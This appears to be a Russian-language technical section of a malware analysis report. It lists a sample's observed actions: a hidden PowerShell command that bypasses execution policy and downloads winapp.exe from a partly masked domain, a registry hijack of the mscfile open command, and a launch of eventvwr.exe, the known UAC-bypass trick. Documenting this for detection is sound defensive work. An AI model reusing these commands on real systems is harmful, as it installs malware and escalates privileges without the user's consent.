Техническая информация
- [<HKCU>\Software\Classes\mscfile\shell\open\command] '' = '%TEMP%\winapp.exe'
- https://www.fa##oko.com/docs/winapp.exe как %temp%\winapp.exe
- '<SYSTEM32>\cmd.exe' cmd.exe /c powershell.exe -w hidden -nop -ep bypass (New-Object System.Net.WebClient).DownloadFile('https://www.fa##oko.com/docs/winapp.exe','%TEMP%\winapp.exe') & reg add HKCU\Software\Classes...
- DNS ASK fa##oko.com
- '<SYSTEM32>\cmd.exe' cmd.exe /c powershell.exe -w hidden -nop -ep bypass (New-Object System.Net.WebClient).DownloadFile('https://www.fa##oko.com/docs/winapp.exe','%TEMP%\winapp.exe') & reg add HKCU\Software\Classes...' (со скрытым окном)
- '<SYSTEM32>\reg.exe' add HKCU\Software\Classes\mscfile\shell\open\command /d %TEMP%\winapp.exe /f
- '<SYSTEM32>\eventvwr.exe'